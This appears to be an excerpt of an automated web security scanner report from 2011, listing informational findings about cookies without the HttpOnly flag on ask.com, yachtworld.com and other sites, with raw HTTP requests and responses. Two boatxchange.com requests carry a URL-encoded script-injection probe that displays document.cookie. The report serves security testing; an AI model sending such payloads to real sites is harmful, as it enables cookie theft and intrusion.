Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Content-Length: 66176

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...

9.34. http://www.ask.com/questionoftheday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/questionoftheday

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjQwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:40 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:40 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /questionoftheday HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

9.35. http://www.ask.com/settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/settings

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:28 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:28 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.36. http://www.ask.com/skins previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/skins

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjIxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:21 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.37. http://www.ask.com/videos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/videos

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjE4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:18 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:18 GMT; Path=/
ldpt=porg=5488|0~5489|1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.38. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gcc=RW50ZXJ0YWlubWVudC9PdGhlcg..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:44 GMT; Path=/
clc=RW50ZXJ0YWlubWVudC9PdGhlcg..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:44 GMT; Path=/
ldst=sorg=-1|1296155624688; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/
qh=1-V2hpY2grQW1lcmljYW4rSWRvbCtoYXMrc29sZCt0aGUrbW9zdCthbGJ1bXMlM0Y.; Domain=.ask.com; Path=/
puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjQ0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.39. http://www.ask.com/webadvanced previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/webadvanced

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.40. http://www.boatxchange.com/openx/www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boatxchange.com
Path:	/openx/www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=c987d5934c96c4c513b290cbc2613f56; expires=Fri, 27-Jan-2012 19:53:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /openx/www/delivery/ajs.php?zoneid=1&cb=33609814871&loc=http%3A//www.boatxchange.com/pboats/browse/Makeff2dc%253Cscript%253Ealert%28document.cookie%29%253C/script%253E051e6b7c2ed/Regulator/search.html&referer=http%3A//burp/show/10 HTTP/1.1
Host: www.boatxchange.com
Proxy-Connection: keep-alive
Referer: http://www.boatxchange.com/pboats/browse/Makeff2dc%3Cscript%3Ealert(document.cookie)%3C/script%3E051e6b7c2ed/Regulator/search.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:53:55 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
X-Powered-By: PHP/5.2.3
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=c987d5934c96c4c513b290cbc2613f56; expires=Fri, 27-Jan-2012 19:53:55 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: User-Agent
Content-Length: 973
Content-Type: text/javascript; charset=UTF-8

var OX_aac93bdb = '';
OX_aac93bdb += "<"+"a href=\'http://www.boatxchange.com/openx/www/delivery/ck.php?oaparams=2__bannerid=10__zoneid=1__cb=1debb9b59d__maxdest=http://www.boatxchange.com/sell-a-boat
...[SNIP]...

9.41. http://www.boatxchange.com/openx/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boatxchange.com
Path:	/openx/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=c987d5934c96c4c513b290cbc2613f56; expires=Fri, 27-Jan-2012 19:54:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /openx/www/delivery/lg.php?bannerid=10&campaignid=4&zoneid=1&loc=http%3A%2F%2Fwww.boatxchange.com%2Fpboats%2Fbrowse%2FMakeff2dc%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E051e6b7c2ed%2FRegulator%2Fsearch.html&referer=http%3A%2F%2Fburp%2Fshow%2F10&cb=1debb9b59d HTTP/1.1
Host: www.boatxchange.com
Proxy-Connection: keep-alive
Referer: http://www.boatxchange.com/pboats/browse/Makeff2dc%3Cscript%3Ealert(document.cookie)%3C/script%3E051e6b7c2ed/Regulator/search.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=c987d5934c96c4c513b290cbc2613f56

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:54:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
X-Powered-By: PHP/5.2.3
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=c987d5934c96c4c513b290cbc2613f56; expires=Fri, 27-Jan-2012 19:54:21 GMT; path=/
Content-Length: 43
Vary: User-Agent
Content-Type: image/gif

GIF89a.............!.......,...........D..;

9.42. http://www.dynamicdrive.com/forums/showthread.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/forums/showthread.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bblastvisit=1296157770; expires=Fri, 27-Jan-2012 19:49:30 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.43. http://www.reel-time.com/forum/showthread.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reel-time.com
Path:	/forum/showthread.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bblastvisit=1296157791; expires=Fri, 27 Jan 2012 19:49:51 GMT; path=/; domain=.reel-time.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forum/showthread.php HTTP/1.1
Host: www.reel-time.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.44. http://www.yachtworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 19:22:55 GMT
savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
savedLabel0=24-32%20ft,regulator,Used,2004; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 19:22:55 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.16.10.1296155952; s_pers=%20s_nr%3D1296156196876%7C1298748196876%3B%20s_lv%3D1296156196877%7C1390764196877%3B%20s_lv_s%3DFirst%2520Visit%7C1296157996877%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DBoat_Details_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/index.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:22:55 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: savedSearch0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 19:22:55 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=24-32%20ft,regulator,Used,2004; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 19:22:55 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 61437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

9.45. http://www.yachtworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

yw_locale2=en_US; path=/; expires=Tue, 14-Feb-2079 22:32:55 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_pers=%20s_nr%3D1296155886782%7C1298747886782%3B%20s_lv%3D1296155886784%7C1390763886784%3B%20s_lv_s%3DFirst%2520Visit%7C1296157686784%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:18:48 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: yw_locale2=en_US; path=/; expires=Tue, 14-Feb-2079 22:32:55 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 61431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

9.46. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:06 GMT
VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 